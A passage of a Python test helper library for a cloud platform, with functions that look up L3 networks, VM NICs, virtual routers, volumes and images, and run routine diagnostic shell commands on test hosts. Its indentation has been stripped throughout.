Get L3 Network Service type, e.g. DNS, SNAT, DHCP etc.
'''
l3 = lib_get_l3_by_uuid(l3_uuid)
service_type = []
for service in l3.networkServices:
service_type.append(service.networkServiceType)
return service_type
def lib_get_l3_service_providers(l3):
service_providers = []
for ns in l3.networkServices:
sp_uuid = ns.networkServiceProviderUuid
sp = lib_get_network_service_provider_by_uuid(sp_uuid)
for temp_sp in service_providers:
if temp_sp.uuid == sp_uuid:
break
else:
service_providers.append(sp)
return service_providers
def lib_get_network_service_provider_by_uuid(sp_uuid):
cond = res_ops.gen_query_conditions('uuid', '=', sp_uuid)
test_util.test_logger('look for service provider: %s ' % sp_uuid)
return res_ops.query_resource(res_ops.NETWORK_SERVICE_PROVIDER, cond)[0]
def lib_get_l3_by_uuid(l3_uuid, session_uuid=None):
conditions = res_ops.gen_query_conditions('uuid', '=', l3_uuid)
l3 = res_ops.query_resource(res_ops.L3_NETWORK, conditions)
if l3:
return l3[0]
def lib_get_l3s_uuid_by_vm(vm):
vmNics = vm.vmNics
l3s = []
for vmnic in vmNics:
l3s.append(vmnic.l3NetworkUuid)
return l3s
def lib_get_vm_first_nic(vm):
'''
Will return VM's first NIC
'''
for nic in vm.vmNics:
if nic.deviceId == 0:
return nic
def lib_get_vm_last_nic(vm):
'''
Will return VM's last NIC
'''
vmNics = vm.vmNics
num = len(vmNics) - 1
for nic in vmNics:
if nic.deviceId == num:
return nic
def lib_get_private_l3s_uuid_by_vm(vm):
'''
Will return all l3 uuids that do not belong to the public network or the
management network.
'''
vmNics = vm.vmNics
l3s = []
for vmnic in vmNics:
if not vmnic.metaData or (int(vmnic.metaData) & 4 == 4):
l3s.append(vmnic.l3NetworkUuid)
return l3s
def lib_get_l3s_by_vm(vm):
'''
Get VM's all L3 inventories
'''
l3s_uuid = ','.join(lib_get_l3s_uuid_by_vm(vm))
conditions = res_ops.gen_query_conditions('uuid', 'in', l3s_uuid)
l3s = res_ops.query_resource(res_ops.L3_NETWORK, conditions)
if l3s:
return l3s
def lib_get_l3s_service_type(vm):
l3s = lib_get_l3s_by_vm(vm)
if not l3s:
test_util.test_logger('Did not find l3 for [vm:] %s' % vm.uuid)
return False
svr_type = []
for l3 in l3s:
l3_svr = lib_get_l3_service_type(l3.uuid)
if l3_svr:
svr_type.extend(l3_svr)
return list(set(svr_type))
def lib_get_vm_l3_service_providers(vm):
l3s = lib_get_l3s_by_vm(vm)
if not l3s:
test_util.test_logger('Did not find l3 for [vm:] %s' % vm.uuid)
return False
service_providers = []
for l3 in l3s:
sps = lib_get_l3_service_providers(l3)
for temp_sp1 in sps:
for temp_sp2 in service_providers:
if temp_sp1.uuid == temp_sp2.uuid:
break
else:
service_providers.append(temp_sp1)
return service_providers
def lib_get_vm_l3_service_provider_types(vm):
sps = lib_get_vm_l3_service_providers(vm)
sps_types = []
for sp in sps:
sps_types.append(sp.type)
return sps_types
def lib_check_nic_in_db(vm_inv, l3_uuid):
'''
Check if VM has NIC in l3_uuid
'''
nic_inv = lib_get_vm_nic_by_l3(vm_inv, l3_uuid)
if not nic_inv:
return False
return True
def lib_restart_vm_network(vm_inv, target_l3_uuid = None):
'''
will ssh vm and check all available nic, then use dhclient to get ip
If target_l3_uuid provided, will ssh the IP of NIC on target_l3_uuid
If target_l3_uuid is missed, will use Nic of deviceId=0
'''
if not target_l3_uuid:
nic = lib_get_vm_first_nic(vm_inv)
target_l3_uuid = nic.l3NetworkUuid
script = """#!/bin/sh
pkill -9 dhclient
device_id="0 1 2 3 4 5 6 7 8 9"
available_devices=''
for i in $device_id;do
ifconfig eth$i >/dev/null 2>&1
if [ $? -eq 0 ];then
available_devices="$available_devices eth$i"
fi
done
dhclient $available_devices
"""
lib_execute_command_in_vm(vm_inv, script, target_l3_uuid)
def lib_get_l3_by_l2(l2_uuid):
all_l3s = lib_get_l3s()
l3s = []
for l3 in all_l3s:
if l3.l2NetworkUuid == l2_uuid:
l3s.append(l3)
if not l3s:
test_util.test_logger('Did not find l3 for [l2:] %s' % l2_uuid)
return l3s
#get VM's IP based on providing L3 uuid
def lib_get_vm_ip_by_l3(vm, l3_uuid):
for nic in vm.vmNics:
if nic.l3NetworkUuid == l3_uuid:
return nic.ip
All_L3 = []
PickUp_Limited = 5
def lib_get_random_l3(l3_desc = None, zone_uuid = None):
'''
If no l3 description is provided, it will return a random l3.
If a zone uuid is provided, it will return a random l3 from the given zone.
"system=true" l3 networks are excluded.
Since multi-host testing may have too many l3 networks, the random choice
only picks from the first PickUp_Limited (5) l3 networks when neither a
description nor a zone uuid is given.
'''
global All_L3
global PickUp_Limited
cond = res_ops.gen_query_conditions('state', '=', 'Enabled')
cond = res_ops.gen_query_conditions('system', '!=', True, cond)
if l3_desc:
cond = res_ops.gen_query_conditions('description', '=', l3_desc, cond)
if zone_uuid:
cond = res_ops.gen_query_conditions('zoneUuid', '=', zone_uuid, \
cond)
else:
if zone_uuid:
cond = res_ops.gen_query_conditions('zoneUuid', '=', zone_uuid, \
cond)
else:
if All_L3:
return random.choice(All_L3[0:PickUp_Limited])
l3_invs = res_ops.query_resource(res_ops.L3_NETWORK, cond)
if not l3_desc:
if not zone_uuid:
All_L3 = list(l3_invs)
return random.choice(All_L3[0:PickUp_Limited])
else:
return random.choice(l3_invs[0:PickUp_Limited])
return random.choice(l3_invs)
def lib_get_random_l3_conf_from_plan(l3_net_desc = None, zone_name = None):
global PickUp_Limited
if not l3_net_desc and All_L3:
return random.choice(All_L3[0:PickUp_Limited])
l3_nets = lib_get_l3_confs_from_plan(zone_name)
if l3_net_desc:
for l3 in l3_nets:
if l3.description_ == l3_net_desc:
return l3
else:
if len(l3_nets) < PickUp_Limited:
choice_limit = len(l3_nets)
else:
choice_limit = PickUp_Limited
return random.choice(l3_nets[0:choice_limit])
def lib_get_5_l3_network():
'''
return the first PickUp_Limited (5) l3 inventories
'''
if not All_L3:
lib_get_random_l3()
return All_L3[0:PickUp_Limited]
def lib_get_limited_l3_network(start_l3, end_l3):
'''
return the l3 inventories within the [start_l3:end_l3] slice
'''
if not All_L3:
lib_get_random_l3()
return All_L3[start_l3:end_l3]
def lib_get_l3s():
return res_ops.get_resource(res_ops.L3_NETWORK, session_uuid=None)
def lib_get_l3_by_name(l3_name):
cond = res_ops.gen_query_conditions('name', '=', l3_name)
l3s = res_ops.query_resource_with_num(res_ops.L3_NETWORK, cond, None, 0, 1)
if l3s:
return l3s[0]
test_util.test_logger("Did not find L3 by [l3 name:] %s" % l3_name)
def lib_get_l3_confs_from_plan(zone_name = None):
'''
If providing zone_name, will only return the zone's L3 configurations.
If not, will provide all zones' l3 configurations
'''
l2s = []
l3_nets = []
for zone in deploy_config.zones.get_child_node_as_list('zone'):
if zone_name and zone_name != zone.name_:
continue
if xmlobject.has_element(zone, 'l2Networks'):
if xmlobject.has_element(zone.l2Networks, 'l2NoVlanNetwork'):
l2NoVlanNet = zone.l2Networks.l2NoVlanNetwork
if l2NoVlanNet:
if isinstance(l2NoVlanNet, list):
l2s.extend(l2NoVlanNet)
else:
l2s.append(l2NoVlanNet)
if xmlobject.has_element(zone.l2Networks, 'l2VlanNetwork'):
l2VlanNet = zone.l2Networks.l2VlanNetwork
if l2VlanNet:
if isinstance(l2VlanNet, list):
l2s.extend(l2VlanNet)
else:
l2s.append(l2VlanNet)
for l2 in l2s:
l3s = l2.l3Networks.l3BasicNetwork
if not isinstance(l3s, list):
l3_nets.append(l3s)
else:
l3_nets.extend(l3s)
return l3_nets
def lib_get_all_living_vms():
conditions = res_ops.gen_query_conditions('state', '=', vm_header.RUNNING)
vms = res_ops.query_resource(res_ops.VM_INSTANCE, conditions)
return vms
def lib_find_vms_same_l3_uuid(vm_list):
vms_nics = []
for vm in vm_list:
vms_nics.append([])
for nic in vm.vmNics:
vms_nics[-1].append(nic.l3NetworkUuid)
for l3_uuid in vms_nics[0]:
for other_vm in range(len(vms_nics) - 1):
if not l3_uuid in vms_nics[other_vm + 1]:
break
if other_vm == (len(vms_nics) - 2):
return l3_uuid
def lib_gen_l3_nic_dict_by_nics(nic_list):
l3_nic_dict = {}
for nic in nic_list:
if not nic.l3NetworkUuid in l3_nic_dict.keys():
l3_nic_dict[nic.l3NetworkUuid] = [nic]
else:
l3_nic_dict[nic.l3NetworkUuid].append(nic)
return l3_nic_dict
#-----------Get VM resource-------------
def lib_is_vm_running(vm_inv):
if vm_inv.state == 'Running':
return True
return False
def lib_get_instance_offering_by_uuid(io_uuid):
conditions = res_ops.gen_query_conditions('uuid', '=', io_uuid)
offerings = res_ops.query_resource(res_ops.INSTANCE_OFFERING, conditions)
if offerings:
return offerings[0]
def lib_get_instance_offering_by_name(ins_name):
cond = res_ops.gen_query_conditions('name', '=', ins_name)
ins_offerings = res_ops.query_resource_with_num(res_ops.INSTANCE_OFFERING, cond, None, 0, 1)
if ins_offerings:
return ins_offerings[0]
test_util.test_logger("Did not find instance offering by [instance offering name:] %s" % ins_name)
def lib_get_vm_by_uuid(vm_uuid):
conditions = res_ops.gen_query_conditions('uuid', '=', vm_uuid)
vms = res_ops.query_resource(res_ops.VM_INSTANCE, conditions)
if vms:
return vms[0]
def lib_get_vm_nic_by_l3(vm, l3_uuid):
'''
@params:
vm is vm inventory
l3_uuid: l3 network uuid
@return:
The vm nic inventory
'''
for vmNic in vm.vmNics:
if vmNic.l3NetworkUuid == l3_uuid:
return vmNic
def lib_get_vm_nic_by_vr(vm, vr):
'''
Find a VM's guest (private) nic by giving its VR VM.
If the guest nic is also a public nic (e.g. the public l3 also provides
DNS/DHCP service), it will be returned as well.
'''
test_util.test_logger('vm: %s, vr: %s' % (vm.uuid, vr.uuid))
if vm.uuid == vr.uuid:
return lib_find_vr_pub_nic(vr)
nics = vm.vmNics
for vr_nic in vr.vmNics:
if int(vr_nic.metaData) & 4 == 4 :
for nic in nics:
if nic.l3NetworkUuid == vr_nic.l3NetworkUuid:
return nic
test_util.test_logger("did not find NIC for VM: %s, which is using VR: %s" \
% (vm.uuid, vr.uuid))
def lib_get_vm_internal_id(vm):
cmd = "virsh dumpxml %s|grep internalId|awk -F'>' '{print $2}'|\
awk -F'<' '{print $1}'" % vm.uuid
host_ip = lib_find_host_by_vm(vm).managementIp
rsp = lib_execute_sh_cmd_by_agent(host_ip, cmd)
if rsp.return_code == 0:
ret = rsp.stdout.strip()
test_util.test_logger('Find [vm:] %s [internalId:] %s on [host:] %s iptables' % (vm.uuid, ret, host_ip))
return ret
else:
test_util.test_logger('shell error info: %s' % rsp.stderr)
#test_util.test_logger('shell command: %s' % rsp.command)
test_util.test_logger('Can not get [vm:] %s internal ID on [host:] %s' % (vm.uuid, host_ip))
return None
def lib_get_root_image_from_vm(vm):
for volume in vm.allVolumes:
if volume.type == vol_header.ROOT_VOLUME:
vm_root_image_uuid = volume.rootImageUuid
if not vm_root_image_uuid:
test_util.logger("Can't find root device for [vm:] %s" % vm.uuid)
return False
condition = res_ops.gen_query_conditions('uuid', '=', vm_root_image_uuid)
image = res_ops.query_resource(res_ops.IMAGE, condition)[0]
return image
def lib_get_vm_username(vm):
image = lib_get_root_image_from_vm(vm)
image_plan = lib_get_image_from_plan(image)
if image_plan:
username = image_plan.username_
else:
#image might be created from other root image template
#So there isn't pre-set username/password. Try to use default username.
username = os.environ.get('imageUsername')
return username
def lib_get_vm_password(vm):
image = lib_get_root_image_from_vm(vm)
image_plan = lib_get_image_from_plan(image)
if image_plan:
password = image_plan.password_
else:
#image might be created from other root image template
#So there isn't pre-set username/password. try to use default password.
password = os.environ.get('imagePassword')
return password
def lib_get_nic_by_uuid(vm_nic_uuid, session_uuid=None):
if vm_nic_uuid:
condition = res_ops.gen_query_conditions('uuid', '=', vm_nic_uuid)
return res_ops.query_resource(res_ops.VM_NIC, condition)[0]
else:
test_util.test_logger('vm_nic_uuid is None, so can not get nic inventory')
def lib_get_nic_by_ip(ip_addr, session_uuid=None):
conditions = res_ops.gen_query_conditions('ip', '=', ip_addr)
vm_nic = res_ops.query_resource(res_ops.VM_NIC, conditions, session_uuid)[0]
return vm_nic
def lib_get_vm_by_ip(ip_addr, session_uuid=None):
vm_nic = lib_get_nic_by_ip(ip_addr, session_uuid)
vm_uuid = vm_nic.vmInstanceUuid
return lib_get_vm_by_uuid(vm_uuid)
def lib_get_vm_by_nic(vm_nic_uuid, session_uuid=None):
'''
use compound query method to find vm_inv by vm_nic_uuid.
'''
conditions = res_ops.gen_query_conditions('vmNics.uuid', '=', vm_nic_uuid)
vm_invs = res_ops.query_resource(res_ops.VM_INSTANCE, conditions, \
session_uuid)
if not vm_invs:
test_util.test_logger('Could not find VM by [vmNic:] %s ' % vm_nic_uuid)
else:
return vm_invs[0]
def lib_is_vm_l3_has_vr(vm):
vm_nics = vm.vmNics
vr_l3 = lib_get_all_vr_l3_uuid()
for nic in vm_nics:
if nic.l3NetworkUuid in vr_l3:
test_util.test_logger('[vm:] %s [l3 uuid:] %s has VR network .' % (vm.uuid, nic.l3NetworkUuid))
return True
test_util.test_logger('[vm:] %s l3 networks do not include a VR network.' % vm.uuid)
return False
#-----------Get Virtual Router resource-------------
def lib_find_vr_mgmt_nic(vm):
for nic in vm.vmNics:
if nic.hasattr('metaData') and (int(nic.metaData) & 2 == 2):
return nic
def lib_find_vr_pub_nic(vm):
for nic in vm.vmNics:
if nic.hasattr('metaData') and (int(nic.metaData) & 1 == 1):
return nic
def lib_find_vr_private_nic(vm):
for nic in vm.vmNics:
if nic.hasattr('metaData') and (int(nic.metaData) & 4 == 4):
return nic
def lib_find_vr_by_pri_l3(l3_uuid):
'''
A private l3 might have multiple vrs; this function will only return the
VR which has the DHCP role.
'''
#use compound query condition
cond = res_ops.gen_query_conditions('vmNics.l3NetworkUuid', '=', \
l3_uuid)
#cond = res_ops.gen_query_conditions('vmNics.metaData', '!=', '1', \
# cond)
#cond = res_ops.gen_query_conditions('vmNics.metaData', '!=', '2', \
# cond)
#cond = res_ops.gen_query_conditions('vmNics.metaData', '!=', '3', \
# cond)
cond = res_ops.gen_query_conditions('vmNics.metaData', '>', '3', \
cond)
cond = res_ops.gen_query_conditions('__systemTag__', '=', 'role::DHCP', cond)
vrs = res_ops.query_resource_with_num(res_ops.APPLIANCE_VM, cond, \
None, 0, 1)
if vrs:
return vrs[0]
def lib_find_vr_by_l3_uuid(l3_uuid):
'''
@params: l3_uuid could be any l3_uuid.
l3_uuid could be any of management L3, public L3 and private L3.
@return: will return all VRs, which has vnic belongs to l3_uuid.
'''
vrs = lib_get_all_vrs()
target_vrs = []
for vr in vrs:
for vm_nic in vr.vmNics:
if vm_nic.l3NetworkUuid == l3_uuid:
target_vrs.append(vr)
return target_vrs
def lib_find_vr_by_vm_nic(vm_nic, vm=None):
'''
Return the exact VR by giving a vm nic. Will find NIC's L3 network's VR.
@params:
vm_nic: nic inventory
vm: [Optional] vm inventory
'''
if not vm:
if vm_nic:
vm = lib_get_vm_by_nic(vm_nic.uuid)
else:
test_util.test_warn('Can not find VR, since neither VM nor VM_NIC is provided.')
return
l3_uuid = vm_nic.l3NetworkUuid
return lib_find_vr_by_pri_l3(l3_uuid)
def lib_find_vr_pub_ip(vr_vm):
vr_guest_nic_ip = lib_find_vr_pub_nic(vr_vm).ip
if not vr_guest_nic_ip:
test_util.test_fail('cannot find public nic IP on [virtual router uuid:] %s' % vr_vm.uuid)
return vr_guest_nic_ip
def lib_find_vr_mgmt_ip(vr_vm):
vr_guest_nic_ip = lib_find_vr_mgmt_nic(vr_vm).ip
if not vr_guest_nic_ip:
test_util.test_fail('cannot find management nic IP on [virtual router uuid:] %s' % vr_vm.uuid)
return vr_guest_nic_ip
def lib_find_vr_private_ip(vr_vm):
vr_guest_nic_ip = lib_find_vr_private_nic(vr_vm).ip
if not vr_guest_nic_ip:
test_util.test_fail('cannot find private nic IP on [virtual router uuid:] %s' % vr_vm.uuid)
return vr_guest_nic_ip
def lib_print_vr_dhcp_tables(vr_vm):
'''
Print VR DHCP tables. This API is usually called when checking the DHCP
result failed.
params:
vr_vm: target VR VM.
return:
False: ssh VR or print VR DHCP table command execution failed.
'''
#Check VR DNS table
shell_cmd = host_plugin.HostShellCmd()
shell_cmd.command = 'echo cat /etc/hosts.dhcp:; cat /etc/hosts.dhcp; echo cat /etc/hosts.lease: ; cat /etc/hosts.lease'
vr_public_ip = lib_find_vr_mgmt_ip(vr_vm)
lib_install_testagent_to_vr_with_vr_vm(vr_vm)
rspstr = http.json_dump_post(testagent.build_http_path(vr_public_ip, host_plugin.HOST_SHELL_CMD_PATH), shell_cmd)
rsp = jsonobject.loads(rspstr)
if rsp.return_code != 0:
test_util.test_logger('Can not get [VR:] %s DHCP tables, error log is: %s ' % (vr_vm.uuid, rsp.stderr))
return False
else:
test_util.test_logger("[VR:] %s VR DHCP tables are: \n%s" % (vr_vm.uuid, rsp.stdout))
def lib_print_vr_network_conf(vr_vm):
'''
Print VR network config. This API is usually called when a test failed.
params:
vr_vm: target VR VM.
return:
False: ssh VR or print VR network config failed.
'''
#Check VR DNS table
lib_install_testagent_to_vr_with_vr_vm(vr_vm)
shell_cmd = host_plugin.HostShellCmd()
shell_cmd.command = 'echo cat /etc/resolv.conf:; cat /etc/resolv.conf; echo ifconfig: ; ifconfig; echo iptables-save:; iptables-save'
vr_public_ip = lib_find_vr_mgmt_ip(vr_vm)
rspstr = http.json_dump_post(testagent.build_http_path(vr_public_ip, host_plugin.HOST_SHELL_CMD_PATH), shell_cmd)
rsp = jsonobject.loads(rspstr)
if rsp.return_code != 0:
test_util.test_logger('Can not get [VR:] %s network config, error log is: %s ' % (vr_vm.uuid, rsp.stderr))
return False
else:
test_util.test_logger("[VR:] %s network configuration information is: \n%s" % (vr_vm.uuid, rsp.stdout))
return True
def lib_get_all_appliance_vms(session_uuid=None):
vms = res_ops.get_resource(res_ops.APPLIANCE_VM, session_uuid)
return vms
def lib_get_all_vrs(session_uuid=None):
conditions = res_ops.gen_query_conditions('applianceVmType', '=', 'VirtualRouter')
vrs_virtualrouter = res_ops.query_resource(res_ops.APPLIANCE_VM, conditions, session_uuid)
conditions = res_ops.gen_query_conditions('applianceVmType', '=', 'vrouter')
vrs_vyos = res_ops.query_resource(res_ops.APPLIANCE_VM, conditions, session_uuid)
return vrs_virtualrouter + vrs_vyos
def lib_get_all_user_vms(session_uuid=None):
conditions = res_ops.gen_query_conditions('type', '=', inventory.USER_VM_TYPE)
vms = res_ops.query_resource(res_ops.VM_INSTANCE, conditions, session_uuid)
return vms
def lib_does_l3_has_network_service(l3_uuid):
cond = res_ops.gen_query_conditions('l3NetworkUuid', '=', l3_uuid)
l3_serv = res_ops.query_resource(res_ops.NETWORK_SERVICE_PROVIDER_L3_REF,\
cond)
if l3_serv:
return True
#return a vr list
def lib_find_vr_by_vm(vm, session_uuid=None):
'''
Find VM's all VRs and return a list, which include VR inventory objects.
If vm is VR, will return itself in a list.
params:
- vm: vm inventory object.
- session_uuid: [Optional] current session_uuid, default is admin.
'''
if lib_is_vm_vr(vm):
return [vm]
vm_l3s = []
for vm_nic in vm.vmNics:
vm_l3s.append(vm_nic.l3NetworkUuid)
#need to remove metaData l3NetworkUuid
tmp_l3_list = list(vm_l3s)
for l3_uuid in tmp_l3_list:
if not lib_does_l3_has_network_service(l3_uuid):
vm_l3s.remove(l3_uuid)
if not vm_l3s:
return []
cond = res_ops.gen_query_conditions('vmNics.l3NetworkUuid', 'in', \
','.join(vm_l3s))
cond = res_ops.gen_query_conditions('vmNics.metaData', '>', '3', cond)
cond = res_ops.gen_query_conditions('__systemTag__', '=', 'role::DHCP', cond)
vrs = res_ops.query_resource(res_ops.APPLIANCE_VM, cond, session_uuid)
if not vrs:
test_util.test_logger("Cannot find VM: [%s] 's Virtual Router VM" \
% vm.uuid)
return vrs
def lib_get_all_vr_l3_uuid():
vr_l3 = []
all_l3 = lib_get_l3s()
for l3 in all_l3:
if len(l3.networkServices) != 0:
vr_l3.append(l3.uuid)
return vr_l3
#-----------VM volume operations-------------
def lib_create_volume_from_offering(volume_creation_option=test_util.VolumeOption(), session_uuid=None):
disk_offering_uuid = volume_creation_option.get_disk_offering_uuid()
if not disk_offering_uuid :
result = res_ops.get_resource(res_ops.DISK_OFFERING, session_uuid)
disk_offering_uuid = random.choice(result).uuid
volume_creation_option.set_disk_offering_uuid(disk_offering_uuid)
name = volume_creation_option.get_name()
if not name:
name = "TestVolume"
volume_creation_option.set_name(name)
#[Inlined import]
import zstackwoodpecker.zstack_test.zstack_test_volume as zstack_volume_header
volume = zstack_volume_header.ZstackTestVolume()
volume.set_creation_option(volume_creation_option)
volume.create()
return volume
def lib_delete_volume(volume_uuid, session_uuid=None):
result = vol_ops.delete_volume(volume_uuid, session_uuid)
test_util.test_logger('[volume] uuid: %s is deleted.' % volume_uuid)
def lib_retry_when_exception(function, params, times = 5):
'''
If a function might produce unstable results and raises an exception when
it fails, this helper will retry it. As soon as one execution passes, it
returns that execution's result.
'''
result = False
while times:
try:
result = function(*params)
except Exception as e:
times -= 1
test_util.test_logger('Execute Function: %s meets exception: %s , will retry: %s times' % (function.__name__, e, times))
time.sleep(0.5)
else:
return result
return False
def lib_attach_volume(volume_uuid, vm_uuid, session_uuid=None):
result = lib_retry_when_exception(vol_ops.attach_volume, [volume_uuid, vm_uuid, session_uuid], 1)
test_util.test_logger('[volume:] uuid: %s is attached to [vm:] %s .' % (volume_uuid, vm_uuid))
return result
def lib_detach_volume(volume_uuid, session_uuid=None):
result = vol_ops.detach_volume(volume_uuid, session_uuid)
test_util.test_logger('[volume:] uuid: %s is detached from [vm].' % volume_uuid)
return result
#check if volumeInventory structure is existed.
def lib_check_volume_db_exist(volume):
try:
find_volume = res_ops.get_resource(res_ops.VOLUME, session_uuid=None, uuid=volume.uuid)[0]
except Exception as e:
test_util.test_logger('[volumeInventory uuid:] %s does not exist in database.' % volume.uuid)
return False
test_util.test_logger('[volumeInventory uuid:] %s exist in database.' % volume.uuid)
return find_volume
def lib_get_volume_by_uuid(volume_uuid):
try:
conditions = res_ops.gen_query_conditions('uuid', '=', volume_uuid)
volume = res_ops.query_resource(res_ops.VOLUME, conditions)[0]
return volume
except:
test_util.test_logger('Did not find volume in database with [uuid:] %s' % volume_uuid)
def lib_get_volume_object_host(volume_obj):
volume = volume_obj.get_volume()
try:
primaryStorageUuid = volume.primaryStorageUuid
if not primaryStorageUuid:
test_util.test_logger('Did not find any primary storage for [volume:] %s. Can not find [host] for this volume. It mostly means the volume is not attached to any VM yet. ' % volume.uuid)
return None
if volume.type == 'Data':
ps = lib_get_primary_storage_by_uuid(primaryStorageUuid)
if ps.type == inventory.NFS_PRIMARY_STORAGE_TYPE:
attached_cluster = ','.join(ps.attachedClusterUuids)
conditions = res_ops.gen_query_conditions('clusterUuid', 'in', \
attached_cluster)
conditions = res_ops.gen_query_conditions('state', '=', 'Enabled', \
conditions)
conditions = res_ops.gen_query_conditions('status', '=', \
'Connected', conditions)
host_invs = res_ops.query_resource(res_ops.HOST, conditions)
if host_invs:
host = host_invs[0]
test_util.test_logger('Find [host:] %s for volume' % host.uuid)
return host
else:
test_util.test_logger('Did not find any host, who attached primary storage: [%s] to hold [volume:] %s.' % (primaryStorageUuid, volume.uuid))
vm = volume_obj.get_target_vm().get_vm()
host = lib_get_vm_host(vm)
return host
except:
test_util.test_logger('Could not find any host for [volume:] %s.' % volume.uuid)
def lib_get_volume_host(volume):
try:
primaryStorageUuid = volume.primaryStorageUuid
if not primaryStorageUuid:
test_util.test_logger('Did not find any primary storage for [volume:] %s. Can not find [host] for this volume. It mostly means the volume is not attached to any VM yet. ' % volume.uuid)
return None
conditions = res_ops.gen_query_conditions('uuid', '=', \
primaryStorageUuid)
ps_inv = res_ops.query_resource(res_ops.PRIMARY_STORAGE, conditions, None)[0]
attached_cluster = ','.join(ps_inv.attachedClusterUuids)
conditions = res_ops.gen_query_conditions('clusterUuid', 'in', \
attached_cluster)
conditions = res_ops.gen_query_conditions('state', '=', 'Enabled', \
conditions)
conditions = res_ops.gen_query_conditions('status', '=', \
'Connected', conditions)
host_invs = res_ops.query_resource(res_ops.HOST, conditions)
if host_invs:
host = host_invs[0]
test_util.test_logger('Find [host:] %s for volume' % host.uuid)
return host
else:
test_util.test_logger('Did not find any host, who attached primary storage: [%s] to hold [volume:] %s.' % (primaryStorageUuid, volume.uuid))
except:
test_util.test_logger('Could not find any host for [volume:] %s.' % volume.uuid)
#check if volume file is created in primary storage
def lib_check_volume_file_exist(volume, host=None):
volume_installPath = volume.installPath
if not volume_installPath:
test_util.test_logger('[installPath] is Null for [volume uuid: ] %s .' % volume.uuid)
return False
if not host:
host = lib_get_volume_host(volume)
cmd = host_plugin.HostShellCmd()
file_exist = "file_exist"
cmd.command = '[ -f %s ] && echo %s' % (volume_installPath, file_exist)
rspstr = http.json_dump_post(testagent.build_http_path(host.managementIp, host_plugin.HOST_SHELL_CMD_PATH), cmd)
rsp = jsonobject.loads(rspstr)
output = jsonobject.dumps(rsp.stdout)
if file_exist in output:
test_util.test_logger('[volume file: ] %s exist on [host name:] %s .' % (volume.uuid, host.name))
return True
else:
test_util.test_logger('[volume file: ] %s does not exist on [host name:] %s .' % (volume.uuid, host.name))
return False
#check if volume is attached to vm in Database
def lib_check_is_volume_attached_to_vm_in_db(vm, volume):
find_volume = lib_check_volume_db_exist(volume)
if not find_volume:
return False
if find_volume.vmInstanceUuid == vm.uuid:
test_util.test_logger('[volume:] %s is attached to [vm:] %s in zstack database.' % (volume.uuid, vm.uuid))
return find_volume
else:
test_util.test_logger('[volume:] %s is NOT attached to [vm:] %s in zstack database.' % (volume.uuid, vm.uuid))
return False
#check if volume file is attached to vm
def lib_check_is_volume_attached_to_vm(vm, volume):
find_volume = lib_check_is_volume_attached_to_vm_in_db(vm, volume)
if not find_volume:
return False
if vm.state == vm_header.STOPPED:
test_util.test_logger('[vm:] %s is stopped. Skip volume existence checking.' % vm.uuid)
return True
volume_installPath = volume.installPath
if not volume_installPath:
test_util.test_logger('[installPath] is Null for [volume uuid: ] %s .' % volume.uuid)
return False
host = lib_get_vm_host(vm)
cmd = vm_plugin.VmStatusCmd()
cmd.vm_uuids = [vm.uuid]
rspstr = http.json_dump_post(testagent.build_http_path(host.managementIp, vm_plugin.VM_BLK_STATUS), cmd)
rsp = jsonobject.loads(rspstr)
output = jsonobject.dumps(rsp.vm_status[vm.uuid])
if volume_installPath in output:
test_util.test_logger('[volume file:] %s is found in [vm:] %s on [host:] %s .' % (volume.uuid, vm.uuid, host.managementIp))
return True
else:
test_util.test_logger('[volume file:] %s is not found in [vm:] %s on [host:] %s .' % (volume.uuid, vm.uuid, host.managementIp))
return False
def lib_get_primary_storage_by_vm(vm):
ps_uuid = vm.allVolumes[0].primaryStorageUuid
cond = res_ops.gen_query_conditions('uuid', '=', ps_uuid)
ps = res_ops.query_resource(res_ops.PRIMARY_STORAGE, cond)[0]
return ps
def lib_get_backup_storage_list_by_vm(vm, session_uuid=None):
'''
Return backup storage list which attached to the VM's zone.
'''
zone_uuid = vm.zoneUuid
conditions = res_ops.gen_query_conditions('attachedZoneUuids', 'in', zone_uuid)
bss = res_ops.query_resource(res_ops.BACKUP_STORAGE, conditions, session_uuid)
if not bss:
test_util.test_logger('Can not find [backup storage] record for [vm:] %s.' % vm.uuid)
else:
return bss
def lib_create_template_from_volume(volume_uuid, session_uuid=None):
bss = res_ops.get_resource(res_ops.BACKUP_STORAGE, session_uuid)
volume = lib_get_volume_by_uuid(volume_uuid)
bs_uuid = None
if volume.vmInstanceUuid != None:
vm = lib_get_vm_by_uuid(volume.vmInstanceUuid)
if vm.state == vm_header.RUNNING:
for bs in bss:
if hasattr(inventory, 'IMAGE_STORE_BACKUP_STORAGE_TYPE') and bs.type == inventory.IMAGE_STORE_BACKUP_STORAGE_TYPE:
bs_uuid = bs.uuid
break
if bs_uuid == None:
bs_uuid = bss[random.randint(0, len(bss)-1)].uuid
#[Inlined import]
import zstackwoodpecker.zstack_test.zstack_test_image as zstack_image_header
image = zstack_image_header.ZstackTestImage()
image_creation_option = test_util.ImageOption()
image_creation_option.set_backup_storage_uuid_list([bs_uuid])
image_creation_option.set_root_volume_uuid(volume_uuid)
image_creation_option.set_name('test_image')
image.set_creation_option(image_creation_option)
image.create()
return image
def lib_get_root_volume(vm):
'''
get root volume inventory by vm inventory
'''
volumes = vm.allVolumes
for volume in volumes:
if volume.type == vol_header.ROOT_VOLUME:
return volume
def lib_get_data_volumes(vm):
volumes = vm.allVolumes
data_volumes = []
for volume in volumes:
if volume.type != vol_header.ROOT_VOLUME:
data_volumes.append(volume)
return data_volumes
def lib_destroy_vm_and_data_volumes(vm_inv):
data_volumes = lib_get_data_volumes(vm_inv)
vm_ops.destroy_vm(vm_inv.uuid)
for data_volume in data_volumes:
vol_ops.delete_volume(data_volume.uuid)
def lib_destroy_vm_and_data_volumes_objs_update_test_dict(vm_obj, test_obj_dict):
vm_obj.destroy()
test_obj_dict.rm_vm(vm_obj)
for volume in test_obj_dict.get_volume_list():
volume.clean()
def lib_get_root_volume_uuid(vm):
return vm.rootVolumeUuid
def lib_get_all_volumes(vm):
return vm.allVolumes
#-----------Get Image resource-------------
#Assume all image are using same username and password
def lib_get_vr_image_username(vr_vm):
username = lib_get_vr_image_from_plan(vr_vm).username_
return username
def lib_get_vr_image_password(vr_vm):
password = lib_get_vr_image_from_plan(vr_vm).password_
return password
def lib_get_vr_image_from_plan(vr_vm=None):
if vr_vm:
return lib_get_image_from_plan(lib_get_root_image_from_vm(vr_vm))
vr_image_name = os.environ.get('virtualRouterImageName')
if not vr_image_name:
test_util.logger("Can't find 'virtualRouterImageName' env params, which is used to identify vritual router image")
return None
images = deploy_config.images.image
if not isinstance(images, list):
if images.name_ == vr_image_name:
return images
else:
return None
for image in images:
